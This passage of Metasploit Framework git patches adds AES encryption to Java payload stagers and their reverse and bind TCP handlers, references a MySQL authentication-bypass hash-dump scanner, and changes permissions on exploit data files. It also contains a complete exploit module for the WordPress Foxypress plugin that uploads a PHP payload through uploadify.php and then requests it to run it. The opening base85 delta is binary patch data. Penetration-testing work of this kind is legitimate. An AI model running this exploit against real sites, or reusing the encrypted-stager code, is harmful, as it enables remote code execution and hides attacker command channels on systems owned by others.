zNz58;2h5Ip+F=g)o@+^BW6aJYc7AOJ21fk^+n0k~%a~7P%sL}=AWk=osGmbvNY_Z2
zqRSoDwnNoM;kP8=O4l-}pj~YSzb!RSGf$`NbwTN9S!(`<Ga2=ln#0|V5t5rA*bZkz
z1MRRVsxt7hW$c1$EyGMWFmeO*&B9_zukJvdxx|5FC!84#WT2id9OquB$wIxG|D_Hz
zMDxsLU1>mb`QbntISVUtS!i^#(8!@<E^;f+4V+Wo#AbW-FxDImWT7SA31=~^@s@uV
z^v*(S-13KHC$vTLG7K&iXKrOQ-^zF3Y^r9ylZI7naCJ1m<Q!^?T>o&XcfrNxxm^VC
zx0GbJ66Z0%^K$^ta{-=5d2fd`EKld;Yh3vnDn&c2W%=)N^0lsfts4;8qf&Ciq%})%
z)!f(~f!{MW&xl9h0s@q;(Pmv#W#Phj78FI7XI|t$u++SmJ2y;Q2Tb#lPWVGEq)VyD
z(E_*mtb&I(LvO1f6y#Vhi>(V{=Fq_`tS2j%TLFvWyn>6GwhB7o%IzS;RB^62A5I~9
zv$z!&(6D_<zZ%Wo0x<Y*iQLe^e3I#OGCh14(^ZTq2gZTISv+H9JYrg}AUq_a-g3+9
zz}4~5KC&CMG|TG=`5d?=bLfDjrD^zbgU#N2<l_tY5=@{EM9v=`OWpzi7|MbjFYSbD
zquwlBM`2ta)h#^>H_-M*2R3A3BW39(`mK+fH+RBP&koqs3Ab2!C)^s9<-1`l<G5|K
zKjbG=hUK*k2hx8Ghv`2oPskmI&G9H9`_s?&HXYiVf#Sn)ZlM^<b8%8vM12<B{WFc2
z&-}~b2FY;2x8@3-aSNXLzYTJGnicNIDctTV+|C_h`MX=hOX_9ZAe!6!88D+>ixO}b
zr}%CM?%B={BntGxo&QrZ`m2e~_!(V5sT4$KVO2Zay8%kNBWj0jl>eZ)Jr@*>eS1~u
z?w-ed+R^iL7f32~|7~>lzHMX@s5j`#*zKs4-0*vSWVZuuQF?4PfHd#VfS0?LTlTOb
zeO_t)U5F#7t2ELaLWZ4coJCJ==LWF&0WT{hU-W#>qTF|G1TW4iKWu=$!`=E1khYKX
z@6JLOHN*o|Waq)^(lQUZ%+~S*m1!f|;USt8wzFdcOeS(!^mxsD*wP&MD?iYO4w#R0
zGyN#ao!-qr!&efgug`#OBzUwob7)s7-^kkg2ZYi)H^bnNSK9*0qDSB{2Oh7rw9*iD
z*%J=zs$J)$ncL@ngGj|>BZQDMMt>vZaHF4aOOpLa`s2dEied)}f~WC16RX3)r~|uC
zEV%_Pa<jO$L|Zgk3wuIj?#b$Kp#x9xFt{%RB`ip4kK30VH6#6a?K+)&zs4PE&dk6Z
zD#X)-b3&LjpDDf#Mu&?D<+Eh0IHYNd+-*qnZh-=}&Vna1poOc$WcF!#&dEj|Wv`m`
z>t=f0j|sJ<7LMgYlKig`6`#9p2-tH54mqX!PX=m-!(a1>ZW98GGN0>$=iA{02ljNp
ji{?wjb->H!EA8+iRiXp#Z71$kcUxt?=ALfLJreL=!LL+G

delta 4014
zcmZ8k34BvU6Q9`}Z}Yls(^mpM+5#e%Ne@6M5H2~27AQrE)F=v}jZi3UZNue3P!Ysi
zA07n}L^LWM&}v!@;0<1Qfua`g6H&Ys^%K6Cr1<r-zh7r|W@l$-{`=p3?K8!Diy|){
zdvX`pAWszOPy#<|@QVh&>aY=h)5-n24zIvb4gSzUgQG534u4AcODFvw4gS_a!BJjz
zOotJ0oJ<6X$XZCW(G1#YAv$z)q9#$Y;gYCJOwl0+l@5^{Ow}-rt#pZQ(!6I5X0R}5
zBh1vX6M7_eW=|J3PLgO!?8?cqbj-#a+8w*G*<E4}4m+7ePl=~U>?N@`&-anoS7JX6
zPt{=vdO6xhqX=p`=3<_P`4S6wzy1;juxp@>r{N$LgB_6g(caLp5QlK?q3tfHBusD^
z3%|tS5=Uq_(uJdNG&g^`hGW<mtK&EvuVInI2@=oXoM&oSOekYyqQprOCrd1G;S?-o
zF;(JO8cyS?%Op-`eYOs>aE6BEI#e=1m3WTCfW&io=kp}a)bV^Omi!lJI7^3xbZ9tR
zhguA3I7f$zu!2P;3ys|rTZ<tLBNs}XD{-F0Djk;Kd=?8>RBO19&-tjt8iu7-VjUmj
zMGRlPh7CGgg<%aB>9CqNTdczxCc|o6qTx~vmr1->!%K9y9xv75I=qbIm$Qfvr*H*}
z%OysxV4$v)xRN`$O5!Tkt0i8|dX2<uG`v>B>vY(J*E3)@u>VFDH%YviE4xLa#d@v8
zTUp=62XwoJcj)jCSF{`(X@u)s<X+FM-6?ScgL;?5jdOL}gm?4&W}d%?xx0mZ_wwjI
z4vVt5pTz?#9%QkV#X}Mw*6F-lE_?(ZWzROQYrDiI*3A+hllZvAn1(IZ8rx3m4to!4
zjy=a}wcl@V)$obtN{5BEC*eoyPv?ZxIPOr;hC4~XL90YFd+dY#2*$!tIM`5EU0W5-
zpBh|NT^p=a@B{pa(AmmxcaA9BMGNsMd|Kf%_$-1mzoI(W(4g=++<}l@&|!ULFs$%-
zd_m!E+@s-(3SWYQ2zt@dP{pEfa87kd;mhzf<yhWO7hF<<V9yUPtW)?399H-$?nO}Z
zgNuU&RkZ~ZsyO<!2ybG~udJ$9_&V<84&G4k34E&In+o5;eFz!j>uc-kLX{nN+0Qk<
zjqe~h%91-_f7%-lX!x$e_wap%ZFo@O2lydE+P_=)2tQW%372E*boR8#2tXyz3y13(
z{0cwC&#bMo$Qta*a<}2<3ctWFHT+89*LcX9?aChZ6?drTB~YphhUY2#1`liat-|l{
zh{Esjh=xBX{1Jar_%j?-@Fq}8@4$ZRao50H{6*ofuwUVC_&b6-0Y`PPW^O_0ocW;&
z!uKftq2Zqj|HA)RnR@?m_%|Ly$oyYm(b9@gUAU^YM&WUW-!XY=>9pyD;vo8A^UTt+
z>6!o~PzWV#!fvh7`{g^3kE*z=G;iq8!Nc+fDB%<u;Z09%`>E7~!UY6}5-y=z2lZUr
z0jfDACCizjgu)|MZpt8Un@C0QB#PnivQYivP<>f##ez_nbEPSfF5F6F2*WB;V^iBi
zrV^d-m=Ye`VXaktGroW?5wJjs&Z3JFCkfMfRb|`SaF2CZjc|4qSqR;%ja|A~lTwSb
z+e9{J%~7Ho=jbk^5<SGpO7s+`Sld#&OzI_iQ^yVAU_EXBF7v$$*Op&Zn?F7n4i?wc
zEee-~>qEhX3f|-CPA8^I7lk{_y-%I~mO4JtCi)PnqOXG2`Ow}1=14)qJO$stVS>0|
zPF0P9L(BkserRb(!ME_868)G<=?PR8g{!Iy%EG~l1qzP9_ez|K`;_p)UL|}Sh51V4
ziaZ37pRWlr3b?cWqPG$Q#O#4|3B_qj3=)HRRH(!dF;oeM7^Z|@3|C?VM~@Vvcw#hy
zR@;zY6I>Y5#OX?m5o47YC&nvymFrGpa^^RL>VoybaBaPU*I;k6nZ5!s(+avXn{Rh7
zb48ZZ2O1y+y7C$tb>*mpCIAwe*qhLV1!)QNs?c?Lo5pMrtvgsmm<|@5M+b}G?_d$&
zYz<GONueP<S|mRpJA*V`NpN^uz_~pU;DQg~BM>}oFQ7jqGDv4yUv@o!BduLo*UX5+
zkbtSTz)-*PnaUU#gJGtMfxi`oYdc{?z-EkWg;8YzyD_>f;4ob==vEeR=EfkcEC#3h
zQ_a*EjEO;K)?-O`f^n@-WbMfA+jp?7(Cu-%_07=RO!K5u>g+~vMxjf)HK7xn!LfQy
zw@C3isAz(Tdm!DI)CwtqW|$ZSCwYv?_MK1?ur<LH+OX7=WKL!CEHbB+N1><RMYTGU
zwNB?k&*nlkE-wZ%C_?wUxbAZ(j22T%$;t92C|-w4Oi6V`%2^fAs62`xpAj(5je)ln
ze1+0yoQE{_yL`rg#6b7R4d8Bqnf{a}INz_Lu+P+Y!&*}}E{MUPM(7%cS%j$;gV{zf
z26I}V!k-d_xfF0(BA_%5l?l*8F}Tp5YRqko02=d7G+M<d%uk|Fl|Z42TgPPQW@@5w
z#(M#$&FGM<+Mg1Kg@G2R;j%`WuHBFshuVPY^2ipb^QT6+xQha8)%(-Tv=}td5vIi=
z5axu7{3)y!`&As41md75RjRQx25z6RjJe^ZVGIo8;ug3hdG?nQqW&~nVY(;XOxv{?
zGWl>h$z^3L(=mGda2%FXmWY{RDxa}}5j4|U;PUMtL_aZ8%z`q~S<A)cP)>yXn11cV
z;d0RVQ^v%#-t6v)T){OYH;+N5Da_hjCapcg4LhXYk!Lz$aAly-DK>)Jw3`l_#~Fi_
z(c_0qJFz)=7dW|-Qho-Xg8}rMChrBFO7|j#zGR*_Tov%Oz$(8Z4y&o^tNog(#bHe#
z(gN4S;MzD`N2pv+zm);wh876fcEXJ<aFeOEz|DS{w}&nd)p1Lq%j2S|bkkw#F|fQ|
zG<BQD#T;83@Ka&8{u8$0_<<;7oq+l_YB4X_W-FlIX;SR%MBj+hxPvI3xCf0)k9A3U
zG$!cLNUU#y_3Xbh>0h7lucwR91RL0YSJJ;B;orb?GF_CAZj$Ms)wz6S><MB;!SFjw
z0$>v(e0K~sZwHJJIszT^&&mHE5q;3xpPq9GOF^?!aB>se(+D~3Ej7Uw>c_Y@*%V!=
z`zHJL{ChUqadtOII_YlPDE9tslo5yu5&CYlZ{(wG_>Jq{z5!E`ZgL|?<AEqRn59h7
z6D#TC)4p&Z5z9^s`%vNsOK=LkVOtx)j6+T!*GGG`K+h?J{nmBhz$tkr*3(Cd)<^ht
zeS(%dNk1Hihlm^xPo_kVl=yOOwB@7ad}DI$1DjwQ-3?B(y%ENdy3B7knwW&m{P-O|
zWIWbxWK)-qJ2nH|wVVJw*gdw9BUT<gzT3wUkJ4yIdyoEz-B#%EIC#Zo=;d+Pw}3L~
z%v)m6T5j5X9%9`SF?h0krGxI=dz_JT7@U<VW(etvngjw})Q2SB-?V;&*IkemgLL;y
zmXol=>-NVWJ}T!fSd~C^MUH)Tp*_cI^H9DWC4}})z8#5|fe>`lvR3QTQzk}Q%U5c&
z_d85kV^S2(qR?Gb=V&i2d@5@b6ne9$%BKtM-Yk#ZK07h=*d1FSos+X;M-=Sd5-+9Q
zMQ<nNNF_8&c>U~2j>OANJhgkvk}XO8Tb#(iN7DzaqF#MwocOf<^v@S@OoEgEgN<ie
s;n^m5E(Xsx!wbf4vYKI!@nRFaKu6OI_cW39Qes$ayquWbl6*DbzrDlGYXATM

diff --git a/external/source/javapayload/src/metasploit/AESEncryption.java b/external/source/javapayload/src/metasploit/AESEncryption.java
new file mode 100644
index 0000000000..b8f993b9d6
--- /dev/null
+++ b/external/source/javapayload/src/metasploit/AESEncryption.java
@@ -0,0 +1,42 @@
+package metasploit;
+
+import java.io.DataInputStream;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.security.MessageDigest;
+import java.security.SecureRandom;
+
+import javax.crypto.Cipher;
+import javax.crypto.CipherInputStream;
+import javax.crypto.CipherOutputStream;
+import javax.crypto.spec.IvParameterSpec;
+import javax.crypto.spec.SecretKeySpec;
+
+/**
+ * Utility class to enable AES encryption for stagers. This is in its own class
+ * because it depends on classes only present on Sun JRE 1.4+, and incorporating
+ * it into the main {@link Payload} class would have made it impossible for
+ * other/older JREs to load it.
+ */
+public class AESEncryption {
+	public static Object[] wrapStreams(InputStream in, OutputStream out, String key) throws Exception {
+		DataInputStream din = new DataInputStream(in);
+		din.readInt(); // first class size 0 as marker in JavaPayload
+		SecureRandom sr = new SecureRandom();
+		byte[] outIV = new byte[16];
+		sr.nextBytes(outIV);
+		out.write(outIV);
+		out.flush();
+		byte[] inIV = new byte[16];
+		din.readFully(inIV);
+		byte[] keyBytes = MessageDigest.getInstance("MD5").digest(key.getBytes());
+		Cipher co = Cipher.getInstance("AES/CFB8/NoPadding");
+		co.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(keyBytes, "AES"), new IvParameterSpec(outIV), sr);
+		Cipher ci = Cipher.getInstance("AES/CFB8/NoPadding");
+		ci.init(Cipher.DECRYPT_MODE, new SecretKeySpec(keyBytes, "AES"), new IvParameterSpec(inIV), sr);
+		return new Object[] {
+				new CipherInputStream(din, ci),
+				new CipherOutputStream(out, co),
+		};
+	}
+}
\ No newline at end of file
diff --git a/external/source/javapayload/src/metasploit/Payload.java b/external/source/javapayload/src/metasploit/Payload.java
index 7afa376932..acc87fd744 100644
--- a/external/source/javapayload/src/metasploit/Payload.java
+++ b/external/source/javapayload/src/metasploit/Payload.java
@@ -108,6 +108,9 @@ public class Payload extends ClassLoader {
 			if(props.getProperty("URL", "").startsWith("https:")) {
 				writeEmbeddedFile(clazz, "metasploit/PayloadTrustManager.class", new File(classFile.getParentFile(), "PayloadTrustManager.class"));
 			}
+			if (props.getProperty("AESPassword", null) != null) {
+				writeEmbeddedFile(clazz, "metasploit/AESEncryption.class", new File(classFile.getParentFile(), "AESEncryption.class"));
+			}
 			FileOutputStream fos = new FileOutputStream(propFile);
 			props.store(fos, "");
 			fos.close();
@@ -207,6 +210,15 @@ public class Payload extends ClassLoader {
 				out = socket.getOutputStream();
 			}
 			
+			String aesPassword = props.getProperty("AESPassword", null);
+			if (aesPassword != null) {
+				// load the crypto code via reflection, to avoid loading
+				// it when it is not needed (it requires Sun Java 1.4+ or JCE)
+				Object[] streams = (Object[])Class.forName("metasploit.AESEncryption").getMethod("wrapStreams", new Class[] {InputStream.class, OutputStream.class, String.class}).invoke(null, new Object[] {in, out, aesPassword});
+				in = (InputStream) streams[0];
+				out = (OutputStream) streams[1];
+			}
+			
 			// build the stage parameters, if any
 			StringTokenizer stageParamTokenizer = new StringTokenizer("Payload -- "+props.getProperty("StageParameters", ""), " ");
 			String[] stageParams = new String[stageParamTokenizer.countTokens()];
diff --git a/lib/msf/core/handler/bind_tcp.rb b/lib/msf/core/handler/bind_tcp.rb
index 8051b24764..e2267b650d 100644
--- a/lib/msf/core/handler/bind_tcp.rb
+++ b/lib/msf/core/handler/bind_tcp.rb
@@ -146,7 +146,7 @@ module BindTcp
 				# to implement the Stream interface.
 				conn_threads << framework.threads.spawn("BindTcpHandlerSession", false, client) { |client_copy|
 					begin
-						handle_connection(client_copy)
+						handle_connection(wrap_aes_socket(client_copy))
 					rescue
 						elog("Exception raised from BindTcp.handle_connection: #{$!}")
 					end
@@ -157,6 +157,53 @@ module BindTcp
 		}
 	end
 
+	def wrap_aes_socket(sock)
+		if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == ""
+			return sock
+		end
+		
+		socks = Rex::Socket::tcp_socket_pair()
+		socks[0].extend(Rex::Socket::Tcp)
+		socks[1].extend(Rex::Socket::Tcp)
+		
+		m = OpenSSL::Digest::Digest.new('md5')
+		m.reset
+		key = m.digest(datastore["AESPassword"] || "")
+		
+		Rex::ThreadFactory.spawn('AESEncryption', false) {
+			c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8')
+			c1.encrypt
+			c1.key=key
+			sock.put([0].pack('N'))
+			sock.put(c1.iv=c1.random_iv)
+			buf1 = socks[0].read(4096)
+			while buf1 and buf1 != ""
+				sock.put(c1.update(buf1))
+				buf1 = socks[0].read(4096)
+			end
+			sock.close()
+		}
+		
+		Rex::ThreadFactory.spawn('AESEncryption', false) {
+			c2 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8')
+			c2.decrypt
+			c2.key=key
+			iv=""
+			while iv.length < 16
+				iv << sock.read(16-iv.length)
+			end
+			c2.iv = iv
+			buf2 = sock.read(4096)
+			while buf2 and buf2 != ""
+				socks[0].put(c2.update(buf2))
+				buf2 = sock.read(4096)
+			end
+			socks[0].close()
+		}
+		
+		return socks[1]
+	end
+
 	#
 	# Nothing to speak of.
 	#
diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb
index 9c5f26c8a8..adbc62c954 100644
--- a/lib/msf/core/handler/reverse_tcp.rb
+++ b/lib/msf/core/handler/reverse_tcp.rb
@@ -161,7 +161,7 @@ module ReverseTcp
 			while true
 				client = self.handler_queue.pop
 				begin
-					handle_connection(client)
+					handle_connection(wrap_aes_socket(client))
 				rescue ::Exception
 					elog("Exception raised from handle_connection: #{$!.class}: #{$!}\n\n#{$@.join("\n")}")
 				end
@@ -169,6 +169,51 @@ module ReverseTcp
 		}
 
 	end
+	
+	def wrap_aes_socket(sock)
+		if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == ""
+			return sock
+		end
+		
+		socks = Rex::Socket::tcp_socket_pair()
+		socks[0].extend(Rex::Socket::Tcp)
+		socks[1].extend(Rex::Socket::Tcp)
+		
+		m = OpenSSL::Digest::Digest.new('md5')
+		m.reset
+		key = m.digest(datastore["AESPassword"] || "")
+		
+		Rex::ThreadFactory.spawn('AESEncryption', false) {
+			c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8')
+			c1.encrypt
+			c1.key=key
+			sock.put([0].pack('N'))
+			sock.put(c1.iv=c1.random_iv)
+			buf1 = socks[0].read(4096)
+			while buf1 and buf1 != ""
+				sock.put(c1.update(buf1))
+				buf1 = socks[0].read(4096)
+			end
+			sock.close()
+		}
+		Rex::ThreadFactory.spawn('AESEncryption', false) {
+			c2 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8')
+			c2.decrypt
+			c2.key=key
+			iv=""
+			while iv.length < 16
+				iv << sock.read(16-iv.length)
+			end
+			c2.iv = iv
+			buf2 = sock.read(4096)
+			while buf2 and buf2 != ""
+				socks[0].put(c2.update(buf2))
+				buf2 = sock.read(4096)
+			end
+			socks[0].close()
+		}
+		return socks[1]
+	end
 
 	#
 	# Stops monitoring for an inbound connection.
diff --git a/modules/payloads/stagers/java/bind_tcp.rb b/modules/payloads/stagers/java/bind_tcp.rb
index 9b207f1ff9..20f163346d 100644
--- a/modules/payloads/stagers/java/bind_tcp.rb
+++ b/modules/payloads/stagers/java/bind_tcp.rb
@@ -38,6 +38,7 @@ module Metasploit3
 
 		register_advanced_options(
 			[
+				Msf::OptString.new('AESPassword', [ false, "Password for encrypting communication", '' ]),
 				Msf::OptInt.new('Spawn', [ true, "Number of subprocesses to spawn", 2 ])
 			], self.class
 		)
@@ -49,6 +50,15 @@ module Metasploit3
 		spawn = datastore["Spawn"] || 2
 		c =  ""
 		c << "Spawn=#{spawn}\n"
+		pass = datastore["AESPassword"] || ""
+		if pass != ""
+			c << "AESPassword=#{pass}\n"
+			@class_files = [
+				[ "metasploit", "AESEncryption.class" ],
+			]
+		else
+			@class_files = [ ]
+		end
 		c << "LPORT=#{datastore["LPORT"]}\n" if datastore["LPORT"]
 
 		c
diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb
index 981cee76b8..d21ec0e6b8 100644
--- a/modules/payloads/stagers/java/reverse_tcp.rb
+++ b/modules/payloads/stagers/java/reverse_tcp.rb
@@ -38,6 +38,7 @@ module Metasploit3
 
 		register_advanced_options(
 			[
+				Msf::OptString.new('AESPassword', [ false, "Password for encrypting communication", '' ]),
 				Msf::OptInt.new('Spawn', [ true, "Number of subprocesses to spawn", 2 ])
 			], self.class
 		)
@@ -49,6 +50,15 @@ module Metasploit3
 		spawn = datastore["Spawn"] || 2
 		c =  ""
 		c << "Spawn=#{spawn}\n"
+		pass = datastore["AESPassword"] || ""
+		if pass != ""
+			c << "AESPassword=#{pass}\n"
+			@class_files = [
+				[ "metasploit", "AESEncryption.class" ],
+			]
+		else
+			@class_files = [ ]
+		end
 		c << "LHOST=#{datastore["LHOST"]}\n" if datastore["LHOST"]
 		c << "LPORT=#{datastore["LPORT"]}\n" if datastore["LPORT"]
 

From efbaff8b37b098ef6f41688a72a31320e0a21b75 Mon Sep 17 00:00:00 2001
From: Steve Tornio <swtornio@gmail.com>
Date: Mon, 11 Jun 2012 22:47:30 -0500
Subject: [PATCH 16/18] add osvdb ref

---
 modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb
index 581b77d9e3..bad9a4b837 100644
--- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb
@@ -32,7 +32,8 @@ class Metasploit3 < Msf::Auxiliary
 					'jcran'                                              # Authentication bypass bruteforce implementation
 				],
 			'References'     => [
-					['CVE', '2012-2122']
+					['CVE', '2012-2122'],
+					['OSVDB', '82804']
 				],
 			'DisclosureDate' => 'Jun 09 2012',
 			'License'        => MSF_LICENSE

From 4ae786590adaac95e0b8a3c37646724fde0e7b6d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Tue, 12 Jun 2012 17:39:05 +0200
Subject: [PATCH 17/18] php_wordpress_foxypress from patrick updated. Related
 to Pull Request #475

---
 .../unix/webapp/php_wordpress_foxypress.rb    | 109 ++++++++++++++++++
 1 file changed, 109 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/php_wordpress_foxypress.rb

diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
new file mode 100644
index 0000000000..e14d898a7f
--- /dev/null
+++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
@@ -0,0 +1,109 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'WordPress plugin Foxypress uploadify.php Arbitrary Code Execution',
+			'Description'    => %q{
+					This module exploits an arbitrary PHP code execution flaw in the WordPress
+				blogging software plugin known as Foxypress. The vulnerability allows for arbitrary
+				file upload and remote code execution via the uploadify.php script. The Foxypress
+				plug-in versions 0.4.2.1 and below are vulnerable.
+			},
+			'Author'         =>
+				[
+					'Sammy FORGIT', # Vulnerability Discovery, PoC
+					'patrick' # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					['EDB', '18991'],
+					['OSVDB', '82652'],
+					['BID', '53805'],
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Compat'      =>
+						{
+							'ConnectionType' => 'find',
+						},
+				},
+			'Platform'       => 'php',
+			'Arch'           => ARCH_PHP,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DisclosureDate' => 'Jun 05 2012',
+			'DefaultTarget' => 0))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, "The full URI path to WordPress", "/"]),
+			], self.class)
+	end
+
+	def check
+		uri = target_uri.path
+		uri << '/' if uri[-1,1] != '/'
+
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php"
+		})
+
+		if res and res.code == 200
+			return Exploit::CheckCode::Detected
+		else
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def exploit
+
+		uri = target_uri.path
+		uri << '/' if uri[-1,1] != '/'
+
+		peer = "#{rhost}:#{rport}"
+
+		post_data = Rex::MIME::Message.new
+		post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
+
+		print_status("#{peer} - Sending PHP payload")
+
+		res = send_request_cgi({
+			'method' => 'POST',
+			'uri'    => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php",
+			'ctype'  => 'multipart/form-data; boundary=' + post_data.bound,
+			'data'   => post_data.to_s
+		})
+
+		if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
+			print_error("#{peer} - File wasn't uploaded, aborting!")
+			return
+		end
+
+		print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => "#{uri}wp-content/affiliate_images/#{$1}.php"
+		})
+
+		if res and res.code != 200
+			print_error("#{peer} - Server returned #{res.code.to_s}")
+		end
+
+	end
+
+end

From 21ea5396489d57f883d974bd6c0a20e1fa93bd64 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 12 Jun 2012 00:05:51 -0500
Subject: [PATCH 18/18] Permissions

---
 data/exploits/CVE-2011-3400/CVE-2011-3400.vsd       | Bin
 data/exploits/CVE-2012-0013/[Content_Types].xml     |   0
 data/exploits/CVE-2012-0013/_rels/__rels            |   0
 data/exploits/CVE-2012-0013/docProps/app.xml        |   0
 data/exploits/CVE-2012-0013/docProps/core.xml       |   0
 .../CVE-2012-0013/word/_rels/document.xml.rels      |   0
 .../CVE-2012-0013/word/_rels/vbaProject.bin.rels    |   0
 data/exploits/CVE-2012-0013/word/document.xml       |   0
 .../CVE-2012-0013/word/embeddings/oleObject1.bin    | Bin
 data/exploits/CVE-2012-0013/word/fontTable.xml      |   0
 data/exploits/CVE-2012-0013/word/media/image1.emf   | Bin
 data/exploits/CVE-2012-0013/word/settings.xml       |   0
 data/exploits/CVE-2012-0013/word/styles.xml         |   0
 .../CVE-2012-0013/word/stylesWithEffects.xml        |   0
 data/exploits/CVE-2012-0013/word/theme/theme1.xml   |   0
 data/exploits/CVE-2012-0013/word/vbaData.xml        |   0
 data/exploits/CVE-2012-0013/word/vbaProject.bin     | Bin
 data/exploits/CVE-2012-0013/word/webSettings.xml    |   0
 .../scanner/mysql/mysql_authbypass_hashdump.rb      |   3 +++
 19 files changed, 3 insertions(+)
 mode change 100644 => 100755 data/exploits/CVE-2011-3400/CVE-2011-3400.vsd
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/[Content_Types].xml
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/_rels/__rels
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/docProps/app.xml
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/docProps/core.xml
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/_rels/document.xml.rels
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/_rels/vbaProject.bin.rels
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/document.xml
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/embeddings/oleObject1.bin
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/fontTable.xml
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/media/image1.emf
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/settings.xml
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/styles.xml
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/stylesWithEffects.xml
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/theme/theme1.xml
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/vbaData.xml
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/vbaProject.bin
 mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/webSettings.xml

diff --git a/data/exploits/CVE-2011-3400/CVE-2011-3400.vsd b/data/exploits/CVE-2011-3400/CVE-2011-3400.vsd
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/[Content_Types].xml b/data/exploits/CVE-2012-0013/[Content_Types].xml
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/_rels/__rels b/data/exploits/CVE-2012-0013/_rels/__rels
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/docProps/app.xml b/data/exploits/CVE-2012-0013/docProps/app.xml
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/docProps/core.xml b/data/exploits/CVE-2012-0013/docProps/core.xml
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/word/_rels/document.xml.rels b/data/exploits/CVE-2012-0013/word/_rels/document.xml.rels
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/word/_rels/vbaProject.bin.rels b/data/exploits/CVE-2012-0013/word/_rels/vbaProject.bin.rels
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/word/document.xml b/data/exploits/CVE-2012-0013/word/document.xml
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/word/embeddings/oleObject1.bin b/data/exploits/CVE-2012-0013/word/embeddings/oleObject1.bin
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/word/fontTable.xml b/data/exploits/CVE-2012-0013/word/fontTable.xml
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/word/media/image1.emf b/data/exploits/CVE-2012-0013/word/media/image1.emf
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/word/settings.xml b/data/exploits/CVE-2012-0013/word/settings.xml
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/word/styles.xml b/data/exploits/CVE-2012-0013/word/styles.xml
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/word/stylesWithEffects.xml b/data/exploits/CVE-2012-0013/word/stylesWithEffects.xml
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/word/theme/theme1.xml b/data/exploits/CVE-2012-0013/word/theme/theme1.xml
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/word/vbaData.xml b/data/exploits/CVE-2012-0013/word/vbaData.xml
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/word/vbaProject.bin b/data/exploits/CVE-2012-0013/word/vbaProject.bin
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0013/word/webSettings.xml b/data/exploits/CVE-2012-0013/word/webSettings.xml
old mode 100644
